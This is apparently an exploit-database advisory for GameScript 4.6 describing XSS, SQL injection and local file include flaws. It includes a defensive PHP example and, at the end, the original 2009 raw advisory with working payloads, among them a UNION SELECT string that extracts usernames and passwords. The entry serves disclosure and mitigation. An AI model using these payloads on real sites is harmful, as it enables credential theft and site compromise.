Vendor: GameScript
By: Encrypt3d.M!nd
CVSS: 7.5 (HIGH)
CWE: 79, 89, 22 (XSS, SQL Injection, Local File Include)
Product Name: GameScript
Affected Version From: 4.6
Affected Version To: 4.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

GameScript 4.6 Multiple Vulnerabilities

The GameScript 4.6 web application is vulnerable to XSS, SQL Injection and Local File Include attacks. An attacker can inject malicious JavaScript code into the search parameter of the /games.php page, inject malicious SQL code into the user parameter of the /page.php page, and include a malicious file into the file_to_include parameter of the /page.php page.

Mitigation:

Input validation, parameterized queries, and file access control should be implemented to prevent these attacks.
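
The three mitigations applied to the inputs named above, as an added PHP example. It is not GameScript's code, and the `users` table, the page names and the function names are assumptions.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical hardened handlers, not GameScript's own code.
// Table, column, page and function names are assumptions.

// XSS (games.php, search): encode for the HTML context at output time.
function render_search_term(string $search): string
{
    return htmlspecialchars($search, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// SQL injection (page.php, user): bind the value, never concatenate it.
function find_profile(PDO $db, string $user): ?array
{
    $stmt = $db->prepare('SELECT id, username FROM users WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// File include (page.php, page): the request only selects a key; the file
// name itself always comes from this fixed map, never from the request.
const PAGES = ['viewprofile' => 'viewprofile.php', 'news' => 'news.php'];

function resolve_page(string $page, string $baseDir): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null; // unknown key: the caller should answer 404
    }
    return $baseDir . '/' . PAGES[$page];
}

// Constructed demo data: in-memory SQLite (needs the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)');
$db->exec("INSERT INTO users (username) VALUES ('alice')");

// Inputs: the page's own XSS string, a name containing a quote, and the
// page's placeholder page value, which is not a key in PAGES.
var_dump(render_search_term('"<script>alert(666);</script>'));
var_dump(find_profile($db, 'alice'));
var_dump(find_profile($db, "o'brien"));
var_dump(resolve_page('viewprofile', '/srv/app/pages'));
var_dump(resolve_page('file_to_include', '/srv/app/pages'));
```

The bound value is compared as data only, and a `page` value that is not a key in the map never reaches `include`.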

Exploit-DB raw data:

GameScript 4.6 Multiple Vulnerabilities
(Earlier versions might be affected)

By : Encrypt3d.M!nd

Demo :www.gsdemo.com
just bored  :) 
There are other vulnerabilities, I think

I am Iraqi...Not Arabian
###################################################

Xss :

/games.php?search="<script>alert(666);</script>


Sql injection :

/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*

Local File Include :

/page.php?page=file_to_include

# milw0rm.com [2009-01-28]